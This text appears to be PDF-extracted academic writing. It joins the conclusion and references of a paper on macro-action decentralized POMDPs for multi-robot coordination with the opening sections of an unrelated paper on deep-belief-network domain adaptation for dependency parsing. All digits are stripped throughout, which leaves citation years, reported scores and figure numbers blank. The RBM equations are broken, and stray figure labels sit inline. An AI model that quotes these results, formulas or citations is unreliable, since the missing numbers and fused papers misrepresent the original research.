planning using macro-actions, but learning could also be used to generate policies over macro-actions. in particular, other work developed a method that learns policies using only high-level macro-action trajectories (macro-actions and macro-observations) (liu, amato, anesta, griffith, & how, ). as a result, the methods don’t need any models and are applicable in cases where data is difficult or costly to obtain (e.g., human demonstrations, elaborate training exercises). our experiments showed that the methods can also produce very high-quality solutions, even outperforming and improving upon hand-coded ‘expert’ solutions with a small amount of data. we also improved upon and tested these approaches in a multi-robot search and rescue problem (liu, sivakumar, omidshafiei, amato, & how, ). in general, using macro-actions with other multi-agent reinforcement learning methods (including the popular deep methods e.g., foerster, assael, de freitas, & whiteson, ; omidshafiei, pazis, amato, how, & vian, b; lowe, wu, tamar, harb, abbeel, & mordatch, ; rashid, samvelyan, schroeder, farquhar, foerster, & whiteson, ; palmer, tuyls, bloembergen, & savani, ; omidshafiei, kim, liu, tesauro, riemer, amato, campbell, & how, ) could be a promising way of improving performance, while allowing asynchronous action execution. finally, while this paper focused on dynamic programming (hansen et al., ; seuken & zilberstein, b) and direct policy search methods (oliehoek et al., ), forward search methods (oliehoek et al., ; szer et al., ; oliehoek et al., , ; diban- goye et al., ) are likely to perform well when using macdec-pomdps. when building up policies from the last step, as in dynamic programming, adding macro-actions to the beginning of a tree changes when the macro-actions deeper down the tree will be completed. in forward search methods, actions are added to the leaves of the tree, leaving the com- pletion times for previous macro-actions in the policy (those at earlier heights) the same. we have not explored such search methods for macdec-pomdps, but they appear to be promising. . conclusion we presented a new formulation for representing decentralized decision-making problems under uncertainty using higher-level macro-actions (modeled as options), rather than primi- tive (single-step) actions. we called this framework the macro-action dec-pomdp (macdec- pomdp). because our macro-action model is built on top of the dec-pomdp framework, dec-pomdp algorithms can be extended to solve problems with macro-actions while re- taining agent coordination. we focused on local options, which allow us to reason about coordination only when deciding which option to execute. our results have demonstrated that high-quality results can be achieved on current benchmarks, and that very large prob- lems can be effectively modeled and solved this way. as such, our macro-action framework represents a promising approach for scaling multi-agent planning under uncertainty to real- world problem sizes. we also have demonstrated that complex multi-robot domains can be solved with dec- pomdp-based methods. the macdec-pomdp model is expressive enough to capture modeling and planning with macro-actions in decentralized pomdps multi-robot systems of interest, but also simple enough to be feasible to solve in practice. our results show that a general purpose macdec-pomdp planner can generate cooperative behavior for complex multi-robot domains with task allocation, direct communication, and signaling behavior emerging automatically as properties of the solution for the given problem model. because all cooperative multi-robot problems can be modeled as dec-pomdps, macdec-pomdps represent a powerful tool for automatically trading-off various costs, such as time, resource usage and communication while considering uncertainty in the dynamics, sensors and other robot information. these approaches have great potential to lead to automated solution methods for general probabilistic multi-robot coordination problems with heterogeneous robots in complex, uncertain domains. more generally, this work opens the door to many research questions about representing and solving multi-agent problems hierarchically. promising avenues for future work include exploring different types of options, further work on reinforcement learning for either gen- erating options or policies over options, and developing more scalable solution methods that exploit domain and hierarchical structure. one example of such structure would be the use of a factored reward function (nair et al., ) which allows more efficient policy generation and evaluation. acknowledgements we would like to thank matthijs spaan and feng wu for providing results as well as ari an- ders, gabriel cruz, and christopher maynor for their help with the robot experiments. re- search supported in part by nsf project # , onr muri project #n , darpa yfa d ap , afosr yip fa - - - , and nih r mh . references amato, c., bernstein, d. s., & zilberstein, s. ( a). optimizing fixed-size stochastic controllers for pomdps and decentralized pomdps. journal of autonomous agents and multi-agent systems, ( ), – . amato, c., bonet, b., & zilberstein, s. ( b). finite-state controllers based on mealy machines for centralized and decentralized pomdps. in proceedings of the aaai conference on artificial intelligence, pp. – . amato, c., chowdhary, g., geramifard, a., ure, n. k., & kochenderfer, m. j. ( ). decentralized control of partially observable markov decision processes. in proceedings of the ieee conference on decision and control, pp. – . amato, c., dibangoye, j. s., & zilberstein, s. ( ). incremental policy generation for finite-horizon dec-pomdps. in proceedings of the international conference on au- tomated planning and scheduling, pp. – . amato, c., konidaris, g. d., anders, a., cruz, g., how, j. p., & kaelbling, l. p. ( ). policy search for multi-robot coordination under uncertainty. in proceedings of the robotics: science and systems conference. amato, konidaris, kaelbling & how amato, c., konidaris, g. d., anders, a., cruz, g., how, j. p., & kaelbling, l. p. ( ). policy search for multi-robot coordination under uncertainty. the international jour- nal of robotics research. aras, r., dutech, a., & charpillet, f. ( ). mixed integer linear programming for exact finite-horizon planning in decentralized pomdps. in proceedings of the international conference on automated planning and scheduling, pp. – . balch, t., & arkin, r. c. ( ). behavior-based formation control for multi-robot teams. ieee transactions on robotics and automation, ( ), – . barto, a., & mahadevan, s. ( ). recent advances in hierarchical reinforcement learning. discrete event dynamic systems, , – . becker, r., lesser, v., & zilberstein, s. ( a). decentralized markov decision processes with event-driven interactions. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . becker, r., zilberstein, s., lesser, v., & goldman, c. v. ( b). solving transition- independent decentralized markov decision processes. journal of artificial intelligence research, , – . beckers, r., holland, o., & deneubourg, j.-l. ( ). from local actions to global tasks: stigmergy and collective robotics. in artificial life iv, vol. , p. . belta, c., bicchi, a., egerstedt, m., frazzoli, e., klavins, e., & pappas, g. j. ( ). symbolic planning and control of robot motion [grand challenges of robotics]. robotics & automation magazine, ieee, ( ), – . bernstein, d. s., amato, c., hansen, e. a., & zilberstein, s. ( ). policy iteration for decentralized control of markov decision processes. journal of artificial intelligence research, , – . bernstein, d. s., givan, r., immerman, n., & zilberstein, s. ( ). the complexity of decentralized control of markov decision processes. mathematics of operations research, ( ), – . bohren, j. ( ). smach. http://wiki.ros.org/smach/. boularias, a., & chaib-draa, b. ( ). exact dynamic programming for decentralized pomdps with lossless policy compression. in proceedings of the international con- ference on automated planning and scheduling. dias, m. b., & stentz, a. t. ( ). a comparative study between centralized, market- based, and behavioral multirobot coordination approaches. in proceedings of ieee/rsj international conference on intelligent robots and systems, vol. , pp. – . dibangoye, j. s., amato, c., buffet, o., & charpillet, f. ( ). optimally solving dec- pomdps as continuous-state mdps. in proceedings of the international joint con- ference on artificial intelligence. dibangoye, j. s., amato, c., buffet, o., & charpillet, f. ( ). optimally solving dec- pomdps as continuous-state mdps. journal of artificial intelligence research, , – . modeling and planning with macro-actions in decentralized pomdps dibangoye, j. s., amato, c., doniec, a., & charpillet, f. ( ). producing efficient error- bounded solutions for transition independent decentralized mdps. in proceedings of the international conference on autonomous agents and multiagent systems. dietterich, t. g. ( ). hierarchical reinforcement learning with the maxq value function decomposition. journal of artificial intelligence research, , – . emery-montemerlo, r., gordon, g., schneider, j., & thrun, s. ( ). game theoretic control for robot teams. in proceedings of the international conference on robotics and automation, pp. – . foerster, j., assael, i. a., de freitas, n., & whiteson, s. ( ). learning to communicate with deep multi-agent reinforcement learning. in advances in neural information processing systems, pp. – . gerkey, b. p., & matarić, m. j. ( ). a formal analysis and taxonomy of task allocation in multi-robot systems. international journal of robotics research, ( ), – . ghavamzadeh, m., mahadevan, s., & makar, r. ( ). hierarchical multi-agent rein- forcement learning. journal of autonomous agents and multi-agent systems, ( ), – . hansen, e. a., bernstein, d. s., & zilberstein, s. ( ). dynamic programming for partially observable stochastic games. in proceedings of the national conference on artificial intelligence, pp. – . he, r., brunskill, e., & roy, n. ( ). efficient planning under uncertainty with macro- actions. journal of artificial intelligence research, – . hoang, t. n., xiao, y., sivakumar, k., amato, c., & how, j. ( ). near-optimal ad- versarial policy switching for decentralized asynchronous multi-agent systems. in proceedings of the international conference on robotics and automation. horling, b., & lesser, v. ( ). a survey of multi-agent organizational paradigms. the knowledge engineering review, ( ), – . kaelbling, l. p., littman, m. l., & cassandra, a. r. ( ). planning and acting in partially observable stochastic domains. artificial intelligence, , – . kalra, n., ferguson, d., & stentz, a. t. ( ). hoplites: a market-based framework for planned tight coordination in multirobot teams. in proceedings of the international conference on robotics and automation, pp. – . konidaris, g., & barto, a. g. ( ). building portable options: skill transfer in rein- forcement learning. proceedings of the international joint conference on artificial intelligence, , – . konidaris, g., kaelbling, l. p., & lozano-perez, t. ( ). from skills to symbols: learn- ing symbolic representations for abstract high-level planning. journal of artificial intelligence research, , – . konidaris, g. d., & barto, a. g. ( ). skill discovery in continuous reinforcement learning domains using skill chaining. in advances in neural information processing systems , pp. – . amato, konidaris, kaelbling & how kube, c. r., & bonabeau, e. ( ). cooperative transport by ants and robots. robotics and autonomous systems, ( - ), – . kumar, a., mostafa, h., & zilberstein, s. ( ). dual formulations for optimizing dec- pomdp controllers. in proceedings of the international conference on automated planning and scheduling. kumar, a., & zilberstein, s. ( ). point-based backup for decentralized pomdps: com- plexity and new algorithms. in proceedings of the international conference on au- tonomous agents and multiagent systems, pp. – . kumar, a., zilberstein, s., & toussaint, m. ( ). probabilistic inference techniques for scalable multiagent decision making. journal of artificial intelligence research, ( ), – . lim, z., sun, l., & hsu, d. j. ( ). monte carlo value iteration with macro-actions. in advances in neural information processing systems, pp. – . liu, m., amato, c., anesta, e., griffith, j. d., & how, j. p. ( ). learning for decen- tralized control of multiagent systems in large partially observable stochastic environ- ments. in proceedings of the aaai conference on artificial intelligence. liu, m., amato, c., liao, x., carin, l., & how, j. p. ( ). stick-breaking policy learning in dec-pomdps. in proceedings of the international joint conference on artificial intelligence. liu, m., sivakumar, k., omidshafiei, s., amato, c., & how, j. p. ( ). learning for multi-robot cooperation in partially observable stochastic environments with macro- actions. in proceedings of ieee/rsj international conference on intelligent robots and systems, pp. – . loizou, s. g., & kyriakopoulos, k. j. ( ). automatic synthesis of multi-agent motion tasks based on ltl specifications. in decision and control, . cdc. rd ieee conference on, vol. , pp. – . ieee. lowe, r., wu, y., tamar, a., harb, j., abbeel, o. p., & mordatch, i. ( ). multi-agent actor-critic for mixed cooperative-competitive environments. in advances in neural information processing systems, pp. – . mcgovern, a., & barto, a. g. ( ). automatic discovery of subgoals in reinforcement learning using diverse density. in proceedings of the eighteenth international confer- ence on machine learning, pp. – . melo, f., & veloso, m. ( ). decentralized mdps with sparse interactions. artificial intelligence. messias, j. v., spaan, m. t. j., & lima, p. u. ( ). gsmdps for multi-robot sequential decision-making. in proceedings of the twenty-seventh aaai conference on artificial intelligence, pp. – . nair, r., varakantham, p., tambe, m., & yokoo, m. ( ). networked distributed pomdps: a synthesis of distributed constraint optimization and pomdps. in pro- ceedings of the national conference on artificial intelligence. modeling and planning with macro-actions in decentralized pomdps nguyen, d. t., kumar, a., & lau, h. c. ( a). collective multiagent sequential deci- sion making under uncertainty. in proceedings of the aaai conference on artificial intelligence. nguyen, d. t., kumar, a., & lau, h. c. ( b). policy gradient with value function approximation for collective multiagent planning. in advances in neural information processing systems, pp. – . oliehoek, f. a. ( ). decentralized pomdps. in wiering, m., & van otterlo, m. (eds.), reinforcement learning: state of the art, vol. of adaptation, learning, and opti- mization, pp. – . springer berlin heidelberg. oliehoek, f. a., & amato, c. ( ). a concise introduction to decentralized pomdps. springer. oliehoek, f. a., kooi, j. f., & vlassis, n. ( ). the cross-entropy method for policy search in decentralized pomdps. informatica, , – . oliehoek, f. a., spaan, m. t. j., amato, c., & whiteson, s. ( ). incremental clustering and expansion for faster optimal planning in dec-pomdps. journal of artificial intelligence research, , – . oliehoek, f. a., spaan, m. t. j., & vlassis, n. ( ). optimal and approximate q-value functions for decentralized pomdps. journal of artificial intelligence research, , – . oliehoek, f. a., whiteson, s., & spaan, m. t. j. ( ). lossless clustering of histories in decentralized pomdps. in proceedings of the international conference on au- tonomous agents and multiagent systems. oliehoek, f. a., whiteson, s., & spaan, m. t. j. ( ). approximate solutions for factored dec-pomdps with many agents. in proceedings of the international conference on autonomous agents and multiagent systems. omidshafiei, s., agha-mohammadi, a., amato, c., & how, j. p. ( ). decentralized control of partially observable markov decision processes using belief space macro- actions. in proceedings of the international conference on robotics and automation, pp. – . omidshafiei, s., agha-mohammadi, a., amato, c., & how, j. p. ( ). decentralized control of multi-robot partially observable markov decision processes using belief space macro-actions. the international journal of robotics research. omidshafiei, s., agha-mohammadi, a., amato, c., liu, s.-y., how, j. p., & vian, j. ( ). graph-based cross entropy method for solving multi-robot decentralized pomdps. in proceedings of the international conference on robotics and automation. omidshafiei, s., kim, d.-k., liu, m., tesauro, g., riemer, m., amato, c., campbell, m., & how, j. ( ). learning to teach in cooperative multiagent reinforcement learning. in proceedings of the aaai conference on artificial intelligence. omidshafiei, s., liu, s.-y., everett, m., lopez, b., amato, c., liu, m., how, j. p., & vian., j. ( a). semantic-level decentralized multi-robot decision-making using amato, konidaris, kaelbling & how probabilistic macro-observations. in proceedings of the international conference on robotics and automation. omidshafiei, s., pazis, j., amato, c., how, j. p., & vian, j. ( b). deep decentralized multi-task multi-agent reinforcement learning under partial observability. in proceed- ings of the international conference on machine learning. pajarinen, j. k., & peltonen, j. ( ). periodic finite state controllers for efficient pomdp and dec-pomdp planning. in shawe-taylor, j., zemel, r., bartlett, p., pereira, f., & weinberger, k. (eds.), advances in neural information processing systems , pp. – . palmer, g., tuyls, k., bloembergen, d., & savani, r. ( ). lenient multi-agent deep reinforcement learning. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . parker, l. e. ( ). alliance: an architecture for fault tolerant multirobot cooperation. ieee transactions on robotics and automation, ( ), – . puterman, m. l. ( ). markov decision processes: discrete stochastic dynamic pro- gramming. wiley-interscience. quigley, m., conley, k., gerkey, b. p., faust, j., foote, t., leibs, j., wheeler, r., & ng, a. y. ( ). ros: an open-source robot operating system. in icra workshop on open source software. rashid, t., samvelyan, m., schroeder, c., farquhar, g., foerster, j., & whiteson, s. ( ). qmix: monotonic value function factorisation for deep multi-agent reinforcement learning. in proceedings of the international conference on machine learning, pp. – . rekleitis, i., lee-shue, v., new, a. p., & choset, h. ( ). limited communication, multi- robot team based coverage. in robotics and automation, . proceedings. icra’ . ieee international conference on, vol. , pp. – . ieee. seuken, s., & zilberstein, s. ( a). improved memory-bounded dynamic programming for decentralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence, pp. – . seuken, s., & zilberstein, s. ( b). memory-bounded dynamic programming for dec- pomdps. in proceedings of the international joint conference on artificial intelli- gence, pp. – . silver, d., & ciosek, k. ( ). compositional planning using optimal option models. in proceedings of the international conference on machine learning. sonu, e., chen, y., & doshi, p. ( ). individual planning in agent populations: ex- ploiting anonymity and frame-action hypergraphs. in proceedings of the international conference on automated planning and scheduling. spaan, m. t. j., & melo, f. s. ( ). interaction-driven markov games for decentralized multiagent planning under uncertainty. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . modeling and planning with macro-actions in decentralized pomdps stilman, m., & kuffner, j. ( ). navigation among movable obstacles: real-time reasoning in complex environments. international journal on humanoid robotics, ( ), – . stone, p., sutton, r. s., & kuhlmann, g. ( ). reinforcement learning for robocup soccer keepaway. adaptive behavior, ( ), – . stroupe, a. w., ravichandran, r., & balch, t. ( ). value-based action selection for exploration and dynamic target observation with robot teams. in proceedings of the international conference on robotics and automation, vol. , pp. – . ieee. sutton, r. s., precup, d., & singh, s. ( ). between mdps and semi-mdps: a framework for temporal abstraction in reinforcement learning. artificial intelligence, ( ), – . szer, d., charpillet, f., & zilberstein, s. ( ). maa*: a heuristic search algorithm for solving decentralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence. theocharous, g., & kaelbling, l. p. ( ). approximate planning in pomdps with macro-actions. in advances in neural information processing systems. thrun, s., burgard, w., & fox, d. ( ). probabilistic robotics (intelligent robotics and autonomous agents). the mit press. varakantham, p., adulyasak, y., & jaillet, p. ( ). decentralized stochastic planning with anonymity in interactions. in proceedings of the aaai conference on artificial intelligence, pp. – . velagapudi, p., varakantham, p. r., sycara, k., & scerri, p. ( ). distributed model shaping for scaling to decentralized pomdps with hundreds of agents. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . wu, f., zilberstein, s., & chen, x. ( a). point-based policy generation for decentralized pomdps. in proceedings of the international conference on autonomous agents and multiagent systems, pp. – . wu, f., zilberstein, s., & chen, x. ( b). rollout sampling policy iteration for de- centralized pomdps. in proceedings of the conference on uncertainty in artificial intelligence, pp. – . wu, f., zilberstein, s., & jennings, n. r. ( ). monte-carlo expectation maximization for decentralized pomdps. in proceedings of the international joint conference on artificial intelligence, pp. – . aaai press. domain adaptation for syntactic and semantic dependency parsing using deep belief networks haitong yang, tao zhuang and chengqing zong national laboratory of pattern recognition institute of automation, chinese academy of sciences, beijing, , china {htyang, tao.zhuang, cqzong}@nlpr.ia.ac.cn abstract in current systems for syntactic and seman- tic dependency parsing, people usually de- fine a very high-dimensional feature space to achieve good performance. but these systems often suffer severe performance drops on out- of-domain test data due to the diversity of fea- tures of different domains. this paper fo- cuses on how to relieve this domain adapta- tion problem with the help of unlabeled tar- get domain data. we propose a deep learning method to adapt both syntactic and semantic parsers. with additional unlabeled target do- main data, our method can learn a latent fea- ture representation (lfr) that is beneficial to both domains. experiments on english data in the conll shared task show that our method largely reduced the performance drop on out-of-domain test data. moreover, we get a macro f score that is . points higher than the best system in the conll shared task in out-of-domain tests. introduction both syntactic and semantic dependency parsing are the standard tasks in the nlp community. the state- of-the-art model performs well if the test data comes from the domain of the training data. but if the test data comes from a different domain, the perfor- mance drops severely. the results of the shared tasks of conll and (surdeanu et al., ; hajič et al., ) also substantiates the argument. to relieve the domain adaptation, in this paper, we propose a deep learning method for both syntactic and semantic parsers. we focus on the situation that, besides source domain training data and target do- main test data, we also have some unlabeled target domain data. many syntactic and semantic parsers are devel- oped using a supervised learning paradigm, where each data sample is represented as a vector of fea- tures, usually a high-dimensional feature. the per- formance degradation on target domain test data is mainly caused by the diversity of features of differ- ent domains, i.e., many features in target domain test data are never seen in source domain training data. previous work have shown that using word clus- ters to replace the sparse lexicalized features (koo et al., ; turian et al., ), helps relieve the performance degradation on the target domain. but for syntactic and semantic parsing, people also use a lot of syntactic features, i.e., features extracted from syntactic trees. for example, the relation path be- tween a predicate and an argument is a syntactic fea- ture used in semantic dependency parsing (johans- son and nugues, ). figure shows an exam- ple of this relation path feature. obviously, syntac- tic features like this are also very sparse and usu- ally specific to each domain. the method of clus- tering fails in generalizing these kinds of features. our method, however, is very different from clus- tering specific features and substituting these fea- tures using their clusters. instead, we attack the do- main adaption problem by learning a latent feature representation (lfr) for different domains, which is similar to titov ( ). formally, we propose a deep belief network (dbn) model to represent a data sample using a vector of latent features. this latent feature vector is inferred by our dbn model transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. wantsshe payto ayou .visit p sbj oprd im obj nmod root obj figure : a path feature example. the red edges are the path between she and visit and thus the relation path fea- ture between them is sbj↑oprd↓im↓obj↓ based on the data sample’s original feature vector. our dbn model is trained unsupervisedly on orig- inal feature vectors of data in both domains: train- ing data from the source domain, and unlabeled data from the target domain. so our dbn model can pro- duce a common feature representation for data from both domains. a common feature representation can make two domains more similar and thus is very helpful for domain adaptation (blitzer, ). dis- criminative models using our latent features adapt better to the target domain than models using origi- nal features. discriminative models in syntactic and semantic parsers usually use millions of features. applying a typical dbn to learn a sensible lfr on that many original features is computationally too expensive and impractical (raina et al., ). therefore, we constrain the dbn by splitting the original features into groups. in this way, we largely reduce the com- putational cost and make lfr learning practical. we carried out experiments on the english data of the conll shared task. we use a basic pipelined system and compare the effectiveness of the two fea- ture representations: original feature representation and our lfr. using the original features, the per- formance drop on out-of-domain test data is . points in macro f score. in contrast, using the lfr, the performance drop is only . points. and we have achieved a macro f score of . % on the out-of-domain test data. as far as we know, this is the best result on this data set to date. related work dependency parsing and semantic role labeling are two standard tasks in the nlp community. there have been many works on the two tasks (mcdon- ald et al., ; gildea and jurafsky, ; yang and zong, ; zhuang and zong, a; zhuang and zong, b, etc). among them, researches on domain adaptation for dependency parsing and srl are directly related to our work. dredze et al., ( ) show that domain adaptation is hard for de- pendency parsing based on results in the conll shared task (nivre et al., ). chen et al., ( ) adapted a syntactic dependency parser by learning reliable information on shorter dependen- cies in unlabeled target domain data. but they do not consider the task of semantic dependency pars- ing. huang et al., ( ) used an hmm-based la- tent variable language model to adapt a srl system. their method is tailored for a chunking-based srl system and can hardly be applied to our dependency based task. weston et al., ( ) used deep neural networks to improve an srl system. but their tests are on in-domain data. on methodology, the work in glorot et al., ( ) and titov ( ) is closely related to ours. they also focus on learning lfrs for domain adaptation. however, their work deals with domain adaptation for sentiment classification, which uses much fewer features and training samples. so they do not need to worry about computational cost as much as we do. titov ( ) used a graphical model that has only one layer of hidden variables. on contrast, we need to use a model with two layers of hidden variables and split the first hidden layer to reduce computational cost. the model of titov ( ) also embodies a specific classifier. but our model is in- dependent of the classifier to be used. glorot et al., ( ) used a model called stacked denoising auto-encoders, which also contains multiple hidden layers. however, they do not exploit the hierarchi- cal structure of their model to reduce computational cost. by splitting, our model contains much less pa- rameters than theirs. in fact, the models in glorot et al., ( ) and titov ( ) cannot be applied to our task simply because of the high computational cost. our dbn model for lfr in discriminative models, each data sample is rep- resented as a vector of features. our dbn model maps this original feature vector to a vector of latent features. and we use this latent feature vector to rep- resent the sample, i.e., we replace the whole original feature vector by the latent feature vector. in this section, we introduce how our dbn model repre- sent a data sample as a vector of latent features. be- fore introducing our dbn model, we first review a simpler model called restricted boltzman machines (rbm) (hinton et al., ). when training a dbn model, rbm is used as a basic unit in a dbn. . restricted boltzmann machines an rbm is an undirected graphical model with a layer of visible variables v = (v , ...,vm), and a layer of hidden variables h = (h , ...,hn). these variables are binary. figure shows a graphical rep- resentation of an rbm. ... ... ... ... (a) (b) h v h v figure : graphical representations of an rbm: (a) rep- resents an rbm. (b) is a more compact representation the parameters of an rbm are θ = (w,a,b) where w = (wij)m×n is a matrix with wij be- ing the weight for the edge between vi and hj, and a = (a , ...,am), b = (b , ...,bn) are bias vectors for v and h respectively. the probabilistic model of an rbm is: p(v,h|θ) = z(θ) exp(−e(v,h)) ( ) where e(v,h) = − m∑ i= aivi − n∑ j= bjhj − m∑ i= n∑ j= viwijhj z(θ) = ∑ v,h exp(−e(v,h)) because the connections in an rbm are only be- tween visible and hidden variables, the conditional distribution over a hidden or a visible variable is quite simple: p(hj = |v) = σ(bj + m∑ i= viwij) ( ) p(vi = |h) = σ(ai + n∑ j= hiwij) ( ) where σ(x) = /( + exp(−x)) is the logistic sig- moid function. an rbm can be efficiently trained on a sequence of visible vectors using the contrastive divergence method (hinton, ). . the problem of large scale in our syntactic and semantic parsing task, all fea- tures are binary. so each data sample (an shift ac- tion in syntactic parsing or an argument candidate in semantic parsing) is represented as a binary feature vector. by treating a sample’s feature vector as vis- ible variable vector in an rbm, and taking hidden variables as latent features, we could get the lfr of this sample using the rbm. however, for our syntactic and semantic parsing tasks, training such an rbm is computationally impractical due to the following considerations. let m,n denote respec- tively the number of visible and hidden variables in the rbm. then there are o(mn) parameters in this rbm. if we train the rbm on d samples, then the time complexity for contrastive divergence training is o(mnd). for syntactic or semantic parsing, there are over million unique binary features, and mil- lions of training samples. that means both m and d are in an order of . with m and n of that order, n should not be chosen too small to get a sensible lfr (hinton, ). our experience indicates that n should be at least in an order of . now we see why the o(mnd) complexity is formidable for our task. . our dbn model a dbn is a probabilistic generative model that is composed of multiple layers of stochastic, latent variables (hinton et al., ). the motivation of us- ing a dbn is two-fold. first, previous research has shown that a deep network can capture high-level correlations between visible variables better than an rbm (bengio, ). second, as shown in the pre- ceding subsection, the large scale of our task poses ...h v h ...... ...... ... ... ...... figure : our dbn model. the blue nodes stand for the visible variables (v) and the blank node stands for the hidden variables (h and h ). the symbols are also used in the figures of the following subsectins. a great challenge for learning an lfr. by manipu- lating the hierarchical structure of a dbn, we can significantly reduce the number of parameters in the dbn model. this largely reduces the computational cost for training the dbn. without this technique, it is impractical to learn a dbn model with that many parameters on large training sets. as shown in fig. , our dbn model contains layers of hidden variables: h ,h , and a visible vec- tor v. the visible vector corresponds to a sample’s original feature vector. the second-layer hidden variable vector h are used as the lfr of this sam- ple. suppose there are m,n ,n variables in v,h ,h respectively. to reduce the number of parameters in the dbn, we split its first layer (h − v) into k groups, as we will explain in the following sub- section. we confine the connections in this layer to variables within the same group. so there are only mn /k parameters in the first layer. without splitting, the number of parameters would be mn . therefore, learning that many parameters requires too much computation. by splitting, we reduce the number of parameters by a factor of k. if we choose k big enough, learning is feasible. the second layer (h −h ) is fully connected, so that the variables in the second layer can capture the relations between variables in different groups in the first layer. there are n n parameters in the sec- ond layers. because n and n are relatively small, learning the parameters in the second layer is also feasible. in summary, by splitting the first layer into groups, we have largely reduced the number of pa- rameters in our dbn model. this makes learning our dbn model practical for our task. in our task, visible variables corresponds to original binary fea- tures and the second layer hidden variables are used as the lfr of these original features. one deficiency of splitting is that the relationships between original features in different groups can not be captured by hidden variables in the first layer. however, this de- ficiency is compensated by using the second layer to capture relationships between all variables in the first layer. in this way, the second layer still cap- tures the relationships between all original features indirectly. . . splitting features into groups when we split the first layer into k groups, ev- ery group, except the last one, contains bm/kc vis- ible variables and bn /kc hidden variables. the last group contains the remaining visible and hidden variables. but how to split the visible variables, i.e., the original features, into these groups? of course there are many ways to split the original features. but it is difficult to find a good principle to split. so we tried two splitting strategies in this paper. the first strategy is very simple. we arrange all features as the order they appeared in the training data . sup- pose each group contains r original features. we just put the first r unique features of training data into the first group, the following r unique features into the second group, and so on. the second strategy is more sophisticated. all features can be divided into three categories: the common features, the source-specific features and the target-specific features. its main idea is to make each group contain the three categories of features evenly, which we think makes the distribution of fea- tures close to the ‘true’ distribution over domains. let fs and ft denote the sets of features that ap- peared on source and target domain data respec- tively. we collect fs and ft from our training data. the features in fs and ft are are ordered the same as the order they appeared in training data. and let fs∩t = fs ∩ ft (the common features), fs\t = fs\ft (the source-specific features), ft\s = ft\fs (the target-specific features). so, to evenly dis- tribute features in fs∩t, fs\t and ft\s to each group, each group should consist of |fs∩t|/k, |fs\t|/k and |ft\s|/k features from fs∩t, fs\t and ft\s respec- tively. therefore, we put the first |fs∩t|/k features from fs∩t, the first |fs\t|/k features from fs\t and the first |ft\s|/k features from ft\s into the first group. similarly, we put the second |fs∩t|/k fea- tures from fs∩t, the second |fs\t|/k features from fs\t and the second |ft\s|/k features from ft\s into the second group. the intuition of this strategy is to let features in fs∩t act as pivot features that link fea- tures in fs\t and ft\s in each group. in this way, the first hidden layer might capture better relationships between features from source and target domains. . . lfr of a sample given a sample represented as a vector of origi- nal features, our dbn model will represent it as a vector of latent features. the sample’s original fea- ture vector corresponds to the visible vector v in our dbn model in figure . our dbn model uses the second-layer hidden variable vector h to represent this sample. therefore, we must infer the value of hidden variables in the second-layer given the vis- ible vector. this inference can be done using the methods in hinton et al., ( ). given the visible vector, the values of the hidden variables in every layer can be efficiently inferred in a single, bottom- up pass. . training our dbn model inference in a dbn is simple and fast. nonetheless, training a dbn is more complicated. a dbn can be trained in two stages: greedy layer-wise pretraining and fine tuning (hinton et al., ). . . greedy layer-wise pretraining in this stage, the dbn is treated as a stack of rbms as shown in figure . the second layer is treated as a single rbm. the first layer is treated as k parallel rbms with each group being one rbm. these k rbms are paral- lel because their visible variable vectors constitute a partition of the original feature vector. in this stage, we train these constituent rbms in a bottom- up layer-wise manner. to learn parameters in the first layer, we only need to learn the parameters of each rbm in the first layer. with the original feature vector v given, these k rbms can be trained using the contrastive diver- gence method (hinton, ). after the first layer is ...h h ...... ...... ... ... rbm ... ... rbm ... ... rbm ... ... rbm figure : stack of rbms in pretraining. trained, we will fix the parameters in the first layer and start to train the second layer. for the rbm of the second layer, its visible vari- ables are the hidden variables in the first layer. given an original feature vector v, we first infer the acti- vation probabilities for the hidden variables in the first layer using equation ( ). and we use these ac- tivation probabilities as values for visible variables in the second layer rbm. then we train the second layer rbm using contrastive divergence algorithm. note that the activation probabilities are not binary values. but this is only a trick for training because using probabilities generally produces better models (hinton et al., ). this trick does not change our assumption that each variable is binary. . . fine tuning the greedy layer-wise pretraining initializes the parameters of our dbn to sensible values. but these values are not optimal and the parameters need to be fine tuned. for fine tuning, we unroll the dbn to form an autoencoder as in hinton and salakhutdinov ( ), which is shown in figure . in this autoencoder, the stochastic activities of bi- nary hidden variables are replaced by its activation probabilities. so the autoencoder is in essence a feed-forward neural network. we tune the param- eters of our dbn model on this autoencoder using backpropagation algorithm. domain adaptation with our dbn model in this section, we introduce how to use our dbn model to adapt a basic syntactic and semantic de- ... ...... ...... ...... ...... ...... ...... ...... ...... figure : unrolling the dbn. pendency parsing system to target domain. . the basic pipelined system we build a typical pipelined system, which first an- alyze syntactic dependencies, and then analyze se- mantic dependencies. this basic system only serves as a platform for experimenting with different fea- ture representations. so we just briefly introduce our basic system in this subsection. . . syntactic dependency parsing for syntactic dependency parsing, we use a de- terministic shift-reduce method as in nivre et al., ( ). it has four basic actions: left-arc, right-arc, shift, and reduce. a classifier is used to determine an action at each step. to decide the label for each dependency link, we extend the left/right-arc actions to their corresponding multi-label actions, leading to left-arc and right-arc actions. altogether a - class problem is yielded for parsing action classifi- cation. we add arcs to the dependency graph in an arc eager manner as in hall et al., ( ). we also projectivize the non-projective sequences in training data using the transformation from nivre and nils- son ( ). a maximum entropy classifier is used to make decisions at each step. the features utilized are the same as those in zhao et al., ( ). . . semantic dependency parsing our semantic dependency parser is similar to the one in che et al., ( ). we first train a predicate sense classifier on training data, using the same fea- tures as in che et al., ( ). again, a maximum en- tropy classifier is employed. given a predicate, we need to decide its semantic dependency relation with each word in the sentence. to reduce the number of argument candidates, we adopt the pruning strat- egy in zhao et al., ( ), which is adapted from the strategy in xue and palmer ( ). in the seman- tic role classification stage, we use a maximum en- tropy classifier to predict the probabilities of a can- didate to be each semantic role. we train two differ- ent classifiers for verb and noun predicates using the same features as in che et al., ( ). we use a sim- ple method for post processing. if there are dupli- cate arguments for arg ∼arg , we preserve the one with the highest classification probability and remove its duplicates. . adapting the basic system to target domain in our basic pipeline system, both the syntactic and semantic dependency parsers are built using dis- criminative models. we train a syntactic parsing model and a semantic parsing model using the orig- inal feature representation. we will refer to this syn- tactic parsing model as orisynmodel, and the se- mantic parsing model as orisemmodel. however, these two 